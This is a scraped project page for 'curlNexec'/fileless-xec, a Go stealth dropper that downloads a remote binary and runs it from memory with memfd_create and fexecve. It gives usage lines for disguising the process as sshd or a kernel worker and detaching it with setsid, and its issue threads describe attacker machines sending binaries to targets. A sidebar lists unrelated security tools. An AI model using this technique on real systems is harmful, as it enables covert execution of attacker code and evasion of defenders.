Curl & exec binary file in one step. Also a kind of stealth dropper.

Overview

curlNexec

👋 Certainly useful , mainly for fun, rougly inspired by 0x00 article

Short story

curlNexec enable us to execute a remote binary on a local machine in one step

  • simple usage curlNexec <binary_url>
  • execute binary with specified program name: curlNexec -n /usr/sbin/sshd <binary_raw_url>
  • detach program execution from tty: setsid curlNExec [...]

demo

Explanation We want to execute writeNsleep binary locate on a remote machine, locally.

We first start a python http server on remote. Locally we use curlNexec and impersonate the /usr/sbin/sshd name for the execution of the binary writeNsleep(for stealthiness & fun)

Stealthiness story

memfd_create

The remote binary file is stored locally using memfd_create syscall, which store it within a memory disk which is not mapped into the file system (ie you can't find it using ls).

fexecve

Then we execute it using fexecve syscall (as it is currently not provided by syscall golang library we implem it).

With fexecve , we could but we reference the program to run using a file descriptor, instead of the full path.

other skill for stealthiness

Although not present on the memory disk, the running program can still be detected using ps command for example.

  1. Cover the tracks with a fake program name

curlNexec --name <fake_name> <binary_raw_url> by default the name is [kworker/u:0] 2. Detach from tty to map behaviour of deamon process

setsid curlNexec <binary_raw_url>. WIP call setsid from code

Caveats

You could still be detected with:

$ lsof | grep memfd
You might also like...
One Time Passwords (OTPs) are an mechanism to improve security over passwords alone.

otp: One Time Password utilities Go / Golang Why One Time Passwords? One Time Passwords (OTPs) are an mechanism to improve security over passwords alo

Tool to check whether one of your applications is affected by a vulnerability in log4j: CVE-2021-44228
Tool to check whether one of your applications is affected by a vulnerability in log4j: CVE-2021-44228

log4shell.tools log4shell.tools is a tool allows you to run a test to check whether one of your applications is affected by a vulnerability in log4j:

A simple Go script to brute force or parse a password-protected PKCS#12 (PFX/P12) file.
A simple Go script to brute force or parse a password-protected PKCS#12 (PFX/P12) file.

A simple Go script to brute force or parse a password-protected PKCS#12 (PFX/P12) file.

Find secrets and passwords in container images and file systems
Find secrets and passwords in container images and file systems

Find secrets and passwords in container images and file systems

End-to-end encrypted file transfer for Android. An Android Magic Wormhole client.
End-to-end encrypted file transfer for Android. An Android Magic Wormhole client.

wormhole-william-mobile This is a Magic Wormhole client for Android. (Perhaps someday this will also support iOS). Some current limitations: Receiving

Take a list of domains and scan for endpoints, secrets, api keys, file extensions, tokens and more...
Take a list of domains and scan for endpoints, secrets, api keys, file extensions, tokens and more...

Take a list of domains and scan for endpoints, secrets, api keys, file extensions, tokens and more... Coded with 💙 by edoardottt. Share on Twitter! P

Analyse the content of ipa file.

HelloIPA 对苹果 ipa 包内容进行分析 IsPayloadAppInfoPlist 是 Payload 目录下 app 包中的 Info.plist 文件 GetInfoPlistFileContent 获取 Info.plist 文件内容 GetBuildNumberFromIPA 从

sign Apple’s mobileconfig file to solve the ‘unsigned’ problem
sign Apple’s mobileconfig file to solve the ‘unsigned’ problem

amcs(apple mobile config signature) sign Apple’s mobileconfig file to solve the ‘unsigned’ problem the project rely openssl https://github.com/openssl

Allows you to replace a secret in a file using secrets manager

secrets inserter Allows you to replace a secret in a file using secrets manager. ::SECRET:secret-name:SECRET:: will be replaced with your secret-name

Comments
  • Feature: support for Windows & system w/o memfd_create syscall

    Feature: support for Windows & system w/o memfd_create syscall

    Although fileless-xec is made for stealthiness which mainly stands on memfd_create syscall (make it fileless), it could be interesting to have an option the store the binary file locally before execute it.

    This will make fileless-xec useful for:

    • Target machine which is windows one
    • Target machine without memfd_create syscall
    • Other cases where fileless functionalityis not needed
    enhancement 
    opened by ariary 0
  • Feature: fileless-xec in server mode (wait on target machine)

    Feature: fileless-xec in server mode (wait on target machine)

    fileless-xec is used on target machine to execute a binary file on attacker controlled machine

    From now, attacker machine runs a server which hosts binary file and fileless-xec request it then execute it

    An interesting feature could be to have another type of interaction between target and attacker machine: target machine would have a server (upload binarys server) and attacker machine will send the binary ( trough http, http3, ...) to the server. Once the binary file received the target machine execute it as usual.

    enhancement 
    opened by ariary 0
Releases(v3.2.1)
Owner
Ariary
Security Engineer naively hoping that his technical background will one day be more effective than social engineering
Ariary
ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.

ZipExec ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. This zip file is then base64 encoded i

Tylous 917 Sep 18, 2022
An easy-to-use XChaCha20-encryption wrapper for io.ReadWriteCloser (even lossy UDP) using ECDH key exchange algorithm, ED25519 signatures and Blake3+Poly1305 checksums/message-authentication for Go (golang). Also a multiplexer.

Quick start Prepare keys (on both sides): [ -f ~/.ssh/id_ed25519 ] && [ -f ~/.ssh/id_ed25519.pub ] || ssh-keygen -t ed25519 scp ~/.ssh/id_ed25519.pub

null 26 Sep 27, 2022
crowdsec 5.6k Oct 2, 2022
Go binary that finds .EXEs and .DLLs on the system that don't have security controls enabled

Go Hunt Weak PEs Go binary that finds .EXEs and .DLLs on the system that don't have security controls enabled (ASLR, DEP, CFG etc). Usage $ ./go-hunt-

m0rv4i 13 Oct 28, 2021
Monmind - obfuscate multiple strings & hide text from binary searching

Monmind - obfuscate multiple strings & hide text from binary searching Obfuscation strings in golang code INSTALL You can install monmind by running:

null 12 Aug 28, 2022
Static binary analysis tool to compute shared strings references between binaries and output in JSON, YAML and YARA

StrTwins StrTwins is a binary analysis tool, powered by radare, that is capable to find shared code string references between executables and output i

Anderson 2 May 3, 2022
High-Performance Shortlink ( Short URL ) app creator in Golang. For privacy reasons, you may prefer to host your own short URL app and this is the one to use.

About The Project Shortlink App in Golang Multiple Node based Architecture to create and scale at ease Highly performant key-value storage system Cent

null 126 Sep 7, 2022
Community edition nuclei templates, a simple tool that allows you to organize all the Nuclei templates offered by the community in one place

cent Community edition nuclei templates, a simple tool that allows you to organize all the Nuclei templates offered by the community in one place Inst

null 362 Sep 17, 2022
Pokes users on Slack about outstanding risks found by Crowdstrike Spotlight or vmware Workspace ONE so they can secure their own endpoint.

?? security-slacker Pokes users on Slack about outstanding risks found by Crowdstrike Spotlight or vmware Workspace ONE so they can secure their own e

Niels Hofmans 21 Aug 30, 2022